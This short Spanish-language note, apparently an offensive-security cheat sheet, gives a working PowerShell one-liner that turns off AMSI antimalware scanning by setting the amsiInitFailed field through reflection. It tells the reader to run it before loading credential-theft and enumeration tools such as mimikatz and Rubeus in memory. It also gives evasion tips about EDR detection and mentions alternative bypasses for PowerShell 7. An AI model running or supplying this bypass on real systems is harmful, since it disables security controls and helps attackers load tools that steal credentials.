AMSI bypass PowerShell

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Desactiva AMSI en la sesión actual de PowerShell: las cargas posteriores no se escanean por el antimalware en memoria.

Ejecútalo al inicio de tu sesión de PowerShell, antes de cargar herramientas en memoria (mimikatz, Rubeus, scripts de enumeración). El one-liner pone amsiInitFailed a true y AMSI deja de analizar los scriptblocks de esa sesión.

AMSI es solo una capa: el EDR con hooks en amsi.dll o telemetría de kernel detecta el bypass o el comportamiento posterior. En PowerShell 7 (.NET Core) el campo amsiInitFailed no existe igual: usa el bypass por registro o uno patchless.